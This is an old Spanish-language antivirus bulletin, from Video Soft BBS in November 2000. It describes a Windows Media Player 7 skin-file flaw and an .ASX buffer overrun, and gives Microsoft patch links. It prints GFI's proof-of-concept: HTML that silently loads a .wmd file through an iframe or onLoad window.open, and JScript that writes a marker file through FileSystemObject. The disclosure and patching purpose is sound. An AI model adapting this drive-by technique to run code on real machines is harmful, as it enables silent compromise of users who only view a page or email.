Video Soft BBS


Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Las Noticias
Galería
Chat

Controlado desde el 19/10/97 por NedStat

VSAntivirus   
Esta página es un servicio gratuito de Video Soft BBS -
SUBSCRIBASE en nuestras listas de correo.
Es usted nuestro visitante número  desde el 12 de agosto de 1996

Vulnerabilidad en Microsoft Media Player 7 (y 6.4)
 
VSantivirus No. 140 - Año 4 - Sábado 25 de noviembre de 2000

Vulnerabilidad en Microsoft Media Player 7 (y 6.4)
Modificado domingo 26 de noviembre de 2000

Una falla, descubierta por la empresa de seguridad GFI, afecta a las computadoras con Windows Me (Media Player está instalado aquí por defecto), y Windows 95, 98, NT y 2000, que tengan instalado además del Windows Media Player 7, el Internet Explorer (cualquier versión superior a la 3), Outlook Express 2000, Outlook Express 98, Outlook 2000, Outlook 98 y posiblemente cualquier otro cliente de correo que maneje HTML y javascript.

Según GFI, el problema permite a un usuario malicioso ejecutar un programa, con solo ver un sitio Web o un mensaje de correo con formato HTML.

La vulnerabilidad puede ser explotada, a través de un archivo en javascript (.js) embebido en un archivo de "pieles" (skins), una nueva característica introducida por Microsoft que permite modificar el diseño de la interface de la última versión de su reproductor multimedia Media Player 7 (archivos .wmz) y que también puede ser ocultado en un archivo de descarga de Windows Media (.wmd).

De este modo, el usuario no necesita ejecutar ningún archivo adjunto, debido a que el archivo de Media Player es ejecutado automáticamente usando la etiqueta "iframe" o la función "window.open()" con una etiqueta "<script>".

Estos son algunos ejemplos:

Ejemplo 1 (en un mensaje con formato)

<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { file://v2.0
alert('Este ejemplo abrirá una nueva ventana\n
y automáticamente bajará el archivo wmd\n
y lo ejecutará. Este creará un archivo llamado\n
gfiseclab.txt en su disco C:\\');
window.open(theURL,winName,features);
}
file://-->
</script>
</head>

<body bgcolor="#FFFFFF" onLoad="MM_openBrWindow('http://website/test.wmd',
'','width=0,height=0')">
</Embedded within an HTML e-mail>

Ejemplo 2 (en un mensaje con formato)

<html>
<body>
<script>
alert('Este ejemplo abrirá una nueva ventana\n
y automáticamente bajará el archivo wmd\n
y lo ejecutará. Este creará un archivo llamado\n
gfiseclab.txt en su disco C:\\')
</script>
<iframe src="http://website/test.wmd"></iframe></body>
</html>

El archivo "test.wmd" es un .ZIP que contiene los siguientes archivos:

* test.asx: metafile que apunta a un archivo mpg y al skin 
con el "exploit"

* test.mpg: una película en formato mpeg.

* test.wmz: el skin con el "exploit".

El archivo "test.wmz" también es un archivo ZIP, conteniendo:

* test.js: un archivo en javascript con el siguiente código:

************************************
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);

function onload(){
playAgain();
}
************************************


* test.wms: otro metafile que llama al archivo "test.js"

Solución:

Descargar los parches proporcionados por Microsoft en su boletín de seguridad (MS00-090) (“.ASX Buffer Overrun” and “.WMS Script Execution” Vulnerabilities)

Estos parches cubren además de esta vulnerabilidad, otra anterior, basada en un desbordamiento de búfer existente también en el Windows Media Player, pero que afecta las versiones 6.4 y 7.0, y ocurre cuando se manejan archivos con formato "Active Stream Redirector" (.ASX). Con esta falla, y a través de un archivo .ASX diseñado adecuadamente, que se puede hacer llegar a la computadora de la víctima a través del correo o de una página Web, se logra un desbordamiento de búfer (se sobrepasa el espacio asignado en memoria para guardar ciertos datos). Esto puede causar la ejecución de código malicioso, con el cuál se podría llegar a tomar el control de la computadora atacada.

El parche para esta segunda vulnerabilidad, correspondiente al Windows Media Player 6.4, está disponible en:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069 

El parche para ambas vulnerabilidades para Windows Media Player 7, está disponible en:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26079 

Guía para descargar los parches del Windows Media Player

Si usted desea bajar los parches directamente, incluso usando utilidades como GetRight, FlashGet, y otros, que permiten hacerlo en etapas, resumiendo desde el punto donde se dejó la instalación, le ayudamos a hacerlo con esta guía:

Parche para Media Player 6.4
Nombre del archivo: wmsu33995.exe (484 Kb)

Parche para Media Player 7.0
Nombre del archivo: wmsu34419.EXE (1,501 Kb)

IMPORTANTE: Para instalar el parche para Media Player 7, se debe tener instalada antes la última versión de este programa, la número 1956 (puede averiguar que número de versión tiene, si abre en el Media Player 7, el menú Ayuda, y selecciona "Acerca de..").

Si tuviera una versión inferior a la 1956, antes de aplicar el parche, deberá bajar la última versión del MP7 en español:

Windows Media Player 7.0 versión 1956 en español
Nombre del archivo: wmp7.exe (9 Mb)

Nota: La instalación de los parches está en inglés, pero los archivos modificados son genéricos para todas las versiones, por lo que no hay problema en instalarlos sobre la versión en español del Media Player.

Fuentes:
http://www.gfi.com/press/memp7exploitpr.htm 
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp

Ver también:
18/dic/00 - El correo electrónico, el formato HTML, la música y los virus
16/ene/01 - Vulnerabilidad en Java con WMP 7 e IE
11/mar/01 - El IE puede revelar el contenido y la ubicación del cache

 

Copyright 1996-2000 Video Soft BBS